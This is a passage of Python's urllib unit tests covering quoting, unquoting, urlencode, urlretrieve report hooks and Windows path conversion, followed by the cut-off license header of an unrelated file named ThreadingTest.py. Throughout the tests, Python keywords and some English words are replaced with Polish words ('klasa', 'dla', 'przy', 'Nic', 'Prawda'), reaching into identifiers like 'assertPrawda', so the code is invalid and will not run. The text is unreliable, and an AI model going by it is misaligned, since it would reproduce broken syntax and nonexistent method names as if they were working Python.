self.assertEqual(report[1][2], 5)
def test_reporthook_8193_bytes(self):
# Test on 8193 byte file. Should call reporthook only 3 times (once
# when the "network connection" jest established, once dla the next 8192
# bytes, oraz once dla the last byte).
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile(b"x" * 8193)
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 3)
self.assertEqual(report[0][2], 8193)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[1][1], 8192)
self.assertEqual(report[2][1], 8192)
klasa urlretrieve_HttpTests(unittest.TestCase, FakeHTTPMixin):
"""Test urllib.urlretrieve() using fake http connections"""
def test_short_content_raises_ContentTooShortError(self):
self.fakehttp(b'''HTTP/1.1 200 OK
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Length: 100
Content-Type: text/html; charset=iso-8859-1
FF
''')
def _reporthook(par1, par2, par3):
dalej
przy self.assertRaises(urllib.error.ContentTooShortError):
spróbuj:
urllib.request.urlretrieve('http://example.com/',
reporthook=_reporthook)
w_końcu:
self.unfakehttp()
def test_short_content_raises_ContentTooShortError_without_reporthook(self):
self.fakehttp(b'''HTTP/1.1 200 OK
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Length: 100
Content-Type: text/html; charset=iso-8859-1
FF
''')
przy self.assertRaises(urllib.error.ContentTooShortError):
spróbuj:
urllib.request.urlretrieve('http://example.com/')
w_końcu:
self.unfakehttp()
klasa QuotingTests(unittest.TestCase):
"""Tests dla urllib.quote() oraz urllib.quote_plus()
According to RFC 2396 (Uniform Resource Identifiers), to escape a
character you write it jako '%' + <2 character US-ASCII hex value>.
The Python code of ``'%' + hex(ord(<character>))[2:]`` escapes a
character properly. Case does nie matter on the hex letters.
The various character sets specified are:
Reserved characters : ";/?:@&=+$,"
Have special meaning w URIs oraz must be escaped jeżeli nie being used for
their special meaning
Data characters : letters, digits, oraz "-_.!~*'()"
Unreserved oraz do nie need to be escaped; can be, though, jeżeli desired
Control characters : 0x00 - 0x1F, 0x7F
Have no use w URIs so must be escaped
space : 0x20
Must be escaped
Delimiters : '<>#%"'
Must be escaped
Unwise : "{}|\^[]`"
Must be escaped
"""
def test_never_quote(self):
# Make sure quote() does nie quote letters, digits, oraz "_,.-"
do_not_quote = '' .join(["ABCDEFGHIJKLMNOPQRSTUVWXYZ",
"abcdefghijklmnopqrstuvwxyz",
"0123456789",
"_.-"])
result = urllib.parse.quote(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote(): %r != %r" % (do_not_quote, result))
result = urllib.parse.quote_plus(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote_plus(): %r != %r" % (do_not_quote, result))
def test_default_safe(self):
# Test '/' jest default value dla 'safe' parameter
self.assertEqual(urllib.parse.quote.__defaults__[0], '/')
def test_safe(self):
# Test setting 'safe' parameter does what it should do
quote_by_default = "<>"
result = urllib.parse.quote(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote(): %r != %r" % (quote_by_default, result))
result = urllib.parse.quote_plus(quote_by_default,
safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote_plus(): %r != %r" %
(quote_by_default, result))
# Safe expressed jako bytes rather than str
result = urllib.parse.quote(quote_by_default, safe=b"<>")
self.assertEqual(quote_by_default, result,
"using quote(): %r != %r" % (quote_by_default, result))
# "Safe" non-ASCII characters should have no effect
# (Since URIs are nie allowed to have non-ASCII characters)
result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="\xfc")
expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="")
self.assertEqual(expect, result,
"using quote(): %r != %r" %
(expect, result))
# Same jako above, but using a bytes rather than str
result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe=b"\xfc")
expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="")
self.assertEqual(expect, result,
"using quote(): %r != %r" %
(expect, result))
def test_default_quoting(self):
# Make sure all characters that should be quoted are by default sans
# space (separate test dla that).
should_quote = [chr(num) dla num w range(32)] # For 0x00 - 0x1F
should_quote.append('<>#%"{}|\^[]`')
should_quote.append(chr(127)) # For 0x7F
should_quote = ''.join(should_quote)
dla char w should_quote:
result = urllib.parse.quote(char)
self.assertEqual(hexescape(char), result,
"using quote(): "
"%s should be escaped to %s, nie %s" %
(char, hexescape(char), result))
result = urllib.parse.quote_plus(char)
self.assertEqual(hexescape(char), result,
"using quote_plus(): "
"%s should be escapes to %s, nie %s" %
(char, hexescape(char), result))
usuń should_quote
partial_quote = "ab[]cd"
expected = "ab%5B%5Dcd"
result = urllib.parse.quote(partial_quote)
self.assertEqual(expected, result,
"using quote(): %r != %r" % (expected, result))
result = urllib.parse.quote_plus(partial_quote)
self.assertEqual(expected, result,
"using quote_plus(): %r != %r" % (expected, result))
def test_quoting_space(self):
# Make sure quote() oraz quote_plus() handle spaces jako specified w
# their unique way
result = urllib.parse.quote(' ')
self.assertEqual(result, hexescape(' '),
"using quote(): %r != %r" % (result, hexescape(' ')))
result = urllib.parse.quote_plus(' ')
self.assertEqual(result, '+',
"using quote_plus(): %r != +" % result)
given = "a b cd e f"
expect = given.replace(' ', hexescape(' '))
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
expect = given.replace(' ', '+')
result = urllib.parse.quote_plus(given)
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
def test_quoting_plus(self):
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma'),
'alpha%2Bbeta+gamma')
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', '+'),
'alpha+beta+gamma')
# Test przy bytes
self.assertEqual(urllib.parse.quote_plus(b'alpha+beta gamma'),
'alpha%2Bbeta+gamma')
# Test przy safe bytes
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', b'+'),
'alpha+beta+gamma')
def test_quote_bytes(self):
# Bytes should quote directly to percent-encoded values
given = b"\xa2\xd8ab\xff"
expect = "%A2%D8ab%FF"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Encoding argument should podnieś type error on bytes input
self.assertRaises(TypeError, urllib.parse.quote, given,
encoding="latin-1")
# quote_from_bytes should work the same
result = urllib.parse.quote_from_bytes(given)
self.assertEqual(expect, result,
"using quote_from_bytes(): %r != %r"
% (expect, result))
def test_quote_with_unicode(self):
# Characters w Latin-1 range, encoded by default w UTF-8
given = "\xa2\xd8ab\xff"
expect = "%C2%A2%C3%98ab%C3%BF"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters w Latin-1 range, encoded by przy Nic (default)
result = urllib.parse.quote(given, encoding=Nic, errors=Nic)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters w Latin-1 range, encoded przy Latin-1
given = "\xa2\xd8ab\xff"
expect = "%A2%D8ab%FF"
result = urllib.parse.quote(given, encoding="latin-1")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters w BMP, encoded by default w UTF-8
given = "\u6f22\u5b57" # "Kanji"
expect = "%E6%BC%A2%E5%AD%97"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters w BMP, encoded przy Latin-1
given = "\u6f22\u5b57"
self.assertRaises(UnicodeEncodeError, urllib.parse.quote, given,
encoding="latin-1")
# Characters w BMP, encoded przy Latin-1, przy replace error handling
given = "\u6f22\u5b57"
expect = "%3F%3F" # "??"
result = urllib.parse.quote(given, encoding="latin-1",
errors="replace")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters w BMP, Latin-1, przy xmlcharref error handling
given = "\u6f22\u5b57"
expect = "%26%2328450%3B%26%2323383%3B" # "漢字"
result = urllib.parse.quote(given, encoding="latin-1",
errors="xmlcharrefreplace")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
def test_quote_plus_with_unicode(self):
# Encoding (latin-1) test dla quote_plus
given = "\xa2\xd8 \xff"
expect = "%A2%D8+%FF"
result = urllib.parse.quote_plus(given, encoding="latin-1")
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
# Errors test dla quote_plus
given = "ab\u6f22\u5b57 cd"
expect = "ab%3F%3F+cd"
result = urllib.parse.quote_plus(given, encoding="latin-1",
errors="replace")
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
klasa UnquotingTests(unittest.TestCase):
"""Tests dla unquote() oraz unquote_plus()
See the doc string dla quoting_Tests dla details on quoting oraz such.
"""
def test_unquoting(self):
# Make sure unquoting of all ASCII values works
escape_list = []
dla num w range(128):
given = hexescape(chr(num))
expect = chr(num)
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" %
(expect, result))
escape_list.append(given)
escape_string = ''.join(escape_list)
usuń escape_list
result = urllib.parse.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using unquote(): nie all characters escaped: "
"%s" % result)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, Nic)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, ())
przy support.check_warnings(('', BytesWarning), quiet=Prawda):
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, b'')
def test_unquoting_badpercent(self):
# Test unquoting on bad percent-escapes
given = '%xab'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%x'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
# unquote_to_bytes
given = '%xab'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
given = '%x'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
given = '%'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, Nic)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, ())
def test_unquoting_mixed_case(self):
# Test unquoting on mixed-case hex digits w the percent-escapes
given = '%Ab%eA'
expect = b'\xab\xea'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
def test_unquoting_parts(self):
# Make sure unquoting works when have non-quoted characters
# interspersed
given = 'ab%sd' % hexescape('c')
expect = "abcd"
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" % (expect, result))
def test_unquoting_plus(self):
# Test difference between unquote() oraz unquote_plus()
given = "are+there+spaces..."
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
expect = given.replace('+', ' ')
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" % (expect, result))
def test_unquote_to_bytes(self):
given = 'br%C3%BCckner_sapporo_20050930.doc'
expect = b'br\xc3\xbcckner_sapporo_20050930.doc'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test on a string przy unescaped non-ASCII characters
# (Technically an invalid URI; expect those characters to be UTF-8
# encoded).
result = urllib.parse.unquote_to_bytes("\u6f22%C3%BC")
expect = b'\xe6\xbc\xa2\xc3\xbc' # UTF-8 dla "\u6f22\u00fc"
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test przy a bytes jako input
given = b'%A2%D8ab%FF'
expect = b'\xa2\xd8ab\xff'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test przy a bytes jako input, przy unescaped non-ASCII bytes
# (Technically an invalid URI; expect those bytes to be preserved)
given = b'%A2\xd8ab%FF'
expect = b'\xa2\xd8ab\xff'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
def test_unquote_with_unicode(self):
# Characters w the Latin-1 range, encoded przy UTF-8
given = 'br%C3%BCckner_sapporo_20050930.doc'
expect = 'br\u00fcckner_sapporo_20050930.doc'
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters w the Latin-1 range, encoded przy Nic (default)
result = urllib.parse.unquote(given, encoding=Nic, errors=Nic)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters w the Latin-1 range, encoded przy Latin-1
result = urllib.parse.unquote('br%FCckner_sapporo_20050930.doc',
encoding="latin-1")
expect = 'br\u00fcckner_sapporo_20050930.doc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters w BMP, encoded przy UTF-8
given = "%E6%BC%A2%E5%AD%97"
expect = "\u6f22\u5b57" # "Kanji"
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode przy UTF-8, invalid sequence
given = "%F3%B1"
expect = "\ufffd" # Replacement character
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode przy UTF-8, invalid sequence, replace errors
result = urllib.parse.unquote(given, errors="replace")
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode przy UTF-8, invalid sequence, ignoring errors
given = "%F3%B1"
expect = ""
result = urllib.parse.unquote(given, errors="ignore")
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# A mix of non-ASCII oraz percent-encoded characters, UTF-8
result = urllib.parse.unquote("\u6f22%C3%BC")
expect = '\u6f22\u00fc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# A mix of non-ASCII oraz percent-encoded characters, Latin-1
# (Note, the string contains non-Latin-1-representable characters)
result = urllib.parse.unquote("\u6f22%FC", encoding="latin-1")
expect = '\u6f22\u00fc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
klasa urlencode_Tests(unittest.TestCase):
"""Tests dla urlencode()"""
def help_inputtype(self, given, test_type):
"""Helper method dla testing different input types.
'given' must lead to only the pairs:
* 1st, 1
* 2nd, 2
* 3rd, 3
Test cannot assume anything about order. Docs make no guarantee oraz
have possible dictionary input.
"""
expect_somewhere = ["1st=1", "2nd=2", "3rd=3"]
result = urllib.parse.urlencode(given)
dla expected w expect_somewhere:
self.assertIn(expected, result,
"testing %s: %s nie found w %s" %
(test_type, expected, result))
self.assertEqual(result.count('&'), 2,
"testing %s: expected 2 '&'s; got %s" %
(test_type, result.count('&')))
amp_location = result.index('&')
on_amp_left = result[amp_location - 1]
on_amp_right = result[amp_location + 1]
self.assertPrawda(on_amp_left.isdigit() oraz on_amp_right.isdigit(),
"testing %s: '&' nie located w proper place w %s" %
(test_type, result))
self.assertEqual(len(result), (5 * 3) + 2, #5 chars per thing oraz amps
"testing %s: "
"unexpected number of characters: %s != %s" %
(test_type, len(result), (5 * 3) + 2))
def test_using_mapping(self):
# Test dalejing w a mapping object jako an argument.
self.help_inputtype({"1st":'1', "2nd":'2', "3rd":'3'},
"using dict jako input type")
def test_using_sequence(self):
# Test dalejing w a sequence of two-item sequences jako an argument.
self.help_inputtype([('1st', '1'), ('2nd', '2'), ('3rd', '3')],
"using sequence of two-item tuples jako input")
def test_quoting(self):
# Make sure keys oraz values are quoted using quote_plus()
given = {"&":"="}
expect = "%s=%s" % (hexescape('&'), hexescape('='))
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
given = {"key name":"A bunch of pluses"}
expect = "key+name=A+bunch+of+pluses"
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
def test_doseq(self):
# Test that dalejing Prawda dla 'doseq' parameter works correctly
given = {'sequence':['1', '2', '3']}
expect = "sequence=%s" % urllib.parse.quote_plus(str(['1', '2', '3']))
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
result = urllib.parse.urlencode(given, Prawda)
dla value w given["sequence"]:
expect = "sequence=%s" % value
self.assertIn(expect, result)
self.assertEqual(result.count('&'), 2,
"Expected 2 '&'s, got %s" % result.count('&'))
def test_empty_sequence(self):
self.assertEqual("", urllib.parse.urlencode({}))
self.assertEqual("", urllib.parse.urlencode([]))
def test_nonstring_values(self):
self.assertEqual("a=1", urllib.parse.urlencode({"a": 1}))
self.assertEqual("a=Nic", urllib.parse.urlencode({"a": Nic}))
def test_nonstring_seq_values(self):
self.assertEqual("a=1&a=2", urllib.parse.urlencode({"a": [1, 2]}, Prawda))
self.assertEqual("a=Nic&a=a",
urllib.parse.urlencode({"a": [Nic, "a"]}, Prawda))
data = collections.OrderedDict([("a", 1), ("b", 1)])
self.assertEqual("a=a&a=b",
urllib.parse.urlencode({"a": data}, Prawda))
def test_urlencode_encoding(self):
# ASCII encoding. Expect %3F przy errors="replace'
given = (('\u00a0', '\u00c1'),)
expect = '%3F=%3F'
result = urllib.parse.urlencode(given, encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# Default jest UTF-8 encoding.
given = (('\u00a0', '\u00c1'),)
expect = '%C2%A0=%C3%81'
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
# Latin-1 encoding.
given = (('\u00a0', '\u00c1'),)
expect = '%A0=%C1'
result = urllib.parse.urlencode(given, encoding="latin-1")
self.assertEqual(expect, result)
def test_urlencode_encoding_doseq(self):
# ASCII Encoding. Expect %3F przy errors="replace'
given = (('\u00a0', '\u00c1'),)
expect = '%3F=%3F'
result = urllib.parse.urlencode(given, doseq=Prawda,
encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# ASCII Encoding. On a sequence of values.
given = (("\u00a0", (1, "\u00c1")),)
expect = '%3F=1&%3F=%3F'
result = urllib.parse.urlencode(given, Prawda,
encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# Utf-8
given = (("\u00a0", "\u00c1"),)
expect = '%C2%A0=%C3%81'
result = urllib.parse.urlencode(given, Prawda)
self.assertEqual(expect, result)
given = (("\u00a0", (42, "\u00c1")),)
expect = '%C2%A0=42&%C2%A0=%C3%81'
result = urllib.parse.urlencode(given, Prawda)
self.assertEqual(expect, result)
# latin-1
given = (("\u00a0", "\u00c1"),)
expect = '%A0=%C1'
result = urllib.parse.urlencode(given, Prawda, encoding="latin-1")
self.assertEqual(expect, result)
given = (("\u00a0", (42, "\u00c1")),)
expect = '%A0=42&%A0=%C1'
result = urllib.parse.urlencode(given, Prawda, encoding="latin-1")
self.assertEqual(expect, result)
def test_urlencode_bytes(self):
given = ((b'\xa0\x24', b'\xc1\x24'),)
expect = '%A0%24=%C1%24'
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
result = urllib.parse.urlencode(given, Prawda)
self.assertEqual(expect, result)
# Sequence of values
given = ((b'\xa0\x24', (42, b'\xc1\x24')),)
expect = '%A0%24=42&%A0%24=%C1%24'
result = urllib.parse.urlencode(given, Prawda)
self.assertEqual(expect, result)
def test_urlencode_encoding_safe_parameter(self):
# Send '$' (\x24) jako safe character
# Default utf-8 encoding
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, safe=":$")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, doseq=Prawda, safe=":$")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
# Safe parameter w sequence
given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),)
expect = '%A0$=%C1$&%A0$=13&%A0$=42'
result = urllib.parse.urlencode(given, Prawda, safe=":$")
self.assertEqual(expect, result)
# Test all above w latin-1 encoding
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, safe=":$",
encoding="latin-1")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
given = ((b'\xa0\x24', b'\xc1\x24'),)
expect = '%A0$=%C1$'
result = urllib.parse.urlencode(given, doseq=Prawda, safe=":$",
encoding="latin-1")
given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),)
expect = '%A0$=%C1$&%A0$=13&%A0$=42'
result = urllib.parse.urlencode(given, Prawda, safe=":$",
encoding="latin-1")
self.assertEqual(expect, result)
klasa Pathname_Tests(unittest.TestCase):
"""Test pathname2url() oraz url2pathname()"""
def test_basic(self):
# Make sure simple tests dalej
expected_path = os.path.join("parts", "of", "a", "path")
expected_url = "parts/of/a/path"
result = urllib.request.pathname2url(expected_path)
self.assertEqual(expected_url, result,
"pathname2url() failed; %s != %s" %
(result, expected_url))
result = urllib.request.url2pathname(expected_url)
self.assertEqual(expected_path, result,
"url2pathame() failed; %s != %s" %
(result, expected_path))
def test_quoting(self):
# Test automatic quoting oraz unquoting works dla pathnam2url() oraz
# url2pathname() respectively
given = os.path.join("needs", "quot=ing", "here")
expect = "needs/%s/here" % urllib.parse.quote("quot=ing")
result = urllib.request.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
expect = given
result = urllib.request.url2pathname(result)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
given = os.path.join("make sure", "using_quote")
expect = "%s/using_quote" % urllib.parse.quote("make sure")
result = urllib.request.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
given = "make+sure/using_unquote"
expect = os.path.join("make+sure", "using_unquote")
result = urllib.request.url2pathname(given)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
@unittest.skipUnless(sys.platform == 'win32',
'test specific to the urllib.url2path function.')
def test_ntpath(self):
given = ('/C:/', '///C:/', '/C|//')
expect = 'C:\\'
dla url w given:
result = urllib.request.url2pathname(url)
self.assertEqual(expect, result,
'urllib.request..url2pathname() failed; %s != %s' %
(expect, result))
given = '///C|/path'
expect = 'C:\\path'
result = urllib.request.url2pathname(given)
self.assertEqual(expect, result,
'urllib.request.url2pathname() failed; %s != %s' %
(expect, result))
klasa Utility_Tests(unittest.TestCase):
"""Testcase to test the various utility functions w the urllib."""
def test_thishost(self):
"""Test the urllib.request.thishost utility function returns a tuple"""
self.assertIsInstance(urllib.request.thishost(), tuple)
klasa URLopener_Tests(unittest.TestCase):
"""Testcase to test the open method of URLopener class."""
def test_quoted_open(self):
klasa DummyURLopener(urllib.request.URLopener):
def open_spam(self, url):
zwróć url
przy support.check_warnings(
('DummyURLopener style of invoking requests jest deprecated.',
DeprecationWarning)):
self.assertEqual(DummyURLopener().open(
'spam://example/ /'),'//example/%20/')
# test the safe characters are nie quoted by urlopen
self.assertEqual(DummyURLopener().open(
"spam://c:|windows%/:=&?~#+!$,;'@()*[]|/path/"),
"//c:|windows%/:=&?~#+!$,;'@()*[]|/path/")
# Just commented them out.
# Can't really tell why keep failing w windows oraz sparc.
# Everywhere inaczej they work ok, but on those machines, sometimes
# fail w one of the tests, sometimes w other. I have a linux, oraz
# the tests go ok.
# If anybody has one of the problematic environments, please help!
# . Facundo
#
# def server(evt):
# zaimportuj socket, time
# serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# serv.settimeout(3)
# serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# serv.bind(("", 9093))
# serv.listen()
# spróbuj:
# conn, addr = serv.accept()
# conn.send("1 Hola mundo\n")
# cantdata = 0
# dopóki cantdata < 13:
# data = conn.recv(13-cantdata)
# cantdata += len(data)
# time.sleep(.3)
# conn.send("2 No more lines\n")
# conn.close()
# wyjąwszy socket.timeout:
# dalej
# w_końcu:
# serv.close()
# evt.set()
#
# klasa FTPWrapperTests(unittest.TestCase):
#
# def setUp(self):
# zaimportuj ftplib, time, threading
# ftplib.FTP.port = 9093
# self.evt = threading.Event()
# threading.Thread(target=server, args=(self.evt,)).start()
# time.sleep(.1)
#
# def tearDown(self):
# self.evt.wait()
#
# def testBasic(self):
# # connects
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# ftp.close()
#
# def testTimeoutNic(self):
# # global default timeout jest ignored
# zaimportuj socket
# self.assertIsNic(socket.getdefaulttimeout())
# socket.setdefaulttimeout(30)
# spróbuj:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# w_końcu:
# socket.setdefaulttimeout(Nic)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutDefault(self):
# # global default timeout jest used
# zaimportuj socket
# self.assertIsNic(socket.getdefaulttimeout())
# socket.setdefaulttimeout(30)
# spróbuj:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# w_końcu:
# socket.setdefaulttimeout(Nic)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutValue(self):
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [],
# timeout=30)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
klasa RequestTests(unittest.TestCase):
"""Unit tests dla urllib.request.Request."""
def test_default_values(self):
Request = urllib.request.Request
request = Request("http://www.python.org")
self.assertEqual(request.get_method(), 'GET')
request = Request("http://www.python.org", {})
self.assertEqual(request.get_method(), 'POST')
def test_with_method_arg(self):
Request = urllib.request.Request
request = Request("http://www.python.org", method='HEAD')
self.assertEqual(request.method, 'HEAD')
self.assertEqual(request.get_method(), 'HEAD')
request = Request("http://www.python.org", {}, method='HEAD')
self.assertEqual(request.method, 'HEAD')
self.assertEqual(request.get_method(), 'HEAD')
request = Request("http://www.python.org", method='GET')
self.assertEqual(request.get_method(), 'GET')
request.method = 'HEAD'
self.assertEqual(request.get_method(), 'HEAD')
klasa URL2PathNameTests(unittest.TestCase):
def test_converting_drive_letter(self):
self.assertEqual(url2pathname("///C|"), 'C:')
self.assertEqual(url2pathname("///C:"), 'C:')
self.assertEqual(url2pathname("///C|/"), 'C:\\')
def test_converting_when_no_drive_letter(self):
# cannot end a raw string w \
self.assertEqual(url2pathname("///C/test/"), r'\\\C\test' '\\')
self.assertEqual(url2pathname("////C/test/"), r'\\C\test' '\\')
def test_simple_compare(self):
self.assertEqual(url2pathname("///C|/foo/bar/spam.foo"),
r'C:\foo\bar\spam.foo')
def test_non_ascii_drive_letter(self):
self.assertRaises(IOError, url2pathname, "///\u00e8|/")
def test_roundtrip_url2pathname(self):
list_of_paths = ['C:',
r'\\\C\test\\',
r'C:\foo\bar\spam.foo'
]
dla path w list_of_paths:
self.assertEqual(url2pathname(pathname2url(path)), path)
klasa PathName2URLTests(unittest.TestCase):
def test_converting_drive_letter(self):
self.assertEqual(pathname2url("C:"), '///C:')
self.assertEqual(pathname2url("C:\\"), '///C:')
def test_converting_when_no_drive_letter(self):
self.assertEqual(pathname2url(r"\\\folder\test" "\\"),
'/////folder/test/')
self.assertEqual(pathname2url(r"\\folder\test" "\\"),
'////folder/test/')
self.assertEqual(pathname2url(r"\folder\test" "\\"),
'/folder/test/')
def test_simple_compare(self):
self.assertEqual(pathname2url(r'C:\foo\bar\spam.foo'),
"///C:/foo/bar/spam.foo" )
def test_long_drive_letter(self):
self.assertRaises(IOError, pathname2url, "XX:\\")
def test_roundtrip_pathname2url(self):
list_of_paths = ['///C:',
'/////folder/test/',
'///C:/foo/bar/spam.foo']
dla path w list_of_paths:
self.assertEqual(pathname2url(url2pathname(path)), path)
jeżeli __name__ == '__main__':
unittest.main()
|
ThreadingTest.py
|
##########################################################################
#
# Copyright (c) 2010-2014, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
